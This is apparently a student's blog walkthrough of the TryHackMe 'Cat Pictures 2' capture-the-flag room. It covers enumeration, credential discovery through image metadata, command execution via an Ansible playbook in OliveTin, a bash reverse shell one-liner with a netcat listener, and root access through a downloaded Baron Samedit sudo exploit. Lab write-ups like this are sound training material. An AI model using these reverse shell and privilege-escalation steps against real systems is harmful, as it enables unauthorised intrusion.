Ayman ZERDA

Ayman ZERDA

My name is Ayman Zerda, I am currently a Cybersecurity Engineering Student

TryHackMe: Cat Pictures 2

Published in 07-07, 2023

header

LINK : Cat Pictures 2

Enumeration

  • Started by running an Nmap scan :
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-07 07:21 EDT
Nmap scan report for 10.10.130.123
Host is up (0.064s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.4.6 (Ubuntu)
222/tcp  open  ssh     OpenSSH 9.0 (protocol 2.0)
1337/tcp open  http    OliveTin
3000/tcp open  ppp?
8080/tcp open  http    SimpleHTTPServer 0.6 (Python 3.6.9)

The scan reveals 6 open ports :

  • ssh running on port 22.
  • nginx on port 80.
  • ssh on port 222.
  • OliveTin on port 1337 to access predefined shell commands from a a web interface.
  • Gitea on port 3000.
  • nginx default page on port 8080.
  • On port 80 we have a Lychee photo album with cat pictures, and since this room is about cats, it must be our way to get the first flag.
  • I downloaded all the cats pictures and run exiftool to read the metadata of these pictures.
exiftool *.jpg

catpictures1

  • I noticed that one of these pictures revealed the path to a text file on port 8080.

  • Checking the text file, we found the credentials to access gitea.

catpictures2

FLAG 1 :

  • After gaining the access to the user’s account we found, you will see a file named flag1.txt in ansible repository.

catpictures3

FLAG 2 :

  • Checking the Ansible playbook, you will notice it contains a command line. so the idea here is to change the command and run the playbook from the OliveTin page on port 1337 to see if the command is getting executed.

Ansible playbooks

catpictures4

catpictures5

catpictures6

  • Since the command is getting executed, we can run a reverse shell to us.
bash -c "bash -i >& /dev/tcp/<your-ip-address>/4444 0>&1"

catpictures7

  • Before you run the ansible playbook, let’s open a netcat listener
nc -lvnp 4444

catpictures8

FLAG 3 :

  • In order to speed things up, let’s run linpeas to see if we have a privilege escalation vector.

linpeas

  • The one that stood out is the sudo Baron Samedit.

catpictures9

  • I downloaded this exploit and uploaded it to the target machine.
make

catpictures10

  • let’s run sudo-hax-me-a-sandwic
.\sudo-hax-me-a-sandwic 0

catpictures11

  • Now we are root, change directory to /root and get your 3rd flag.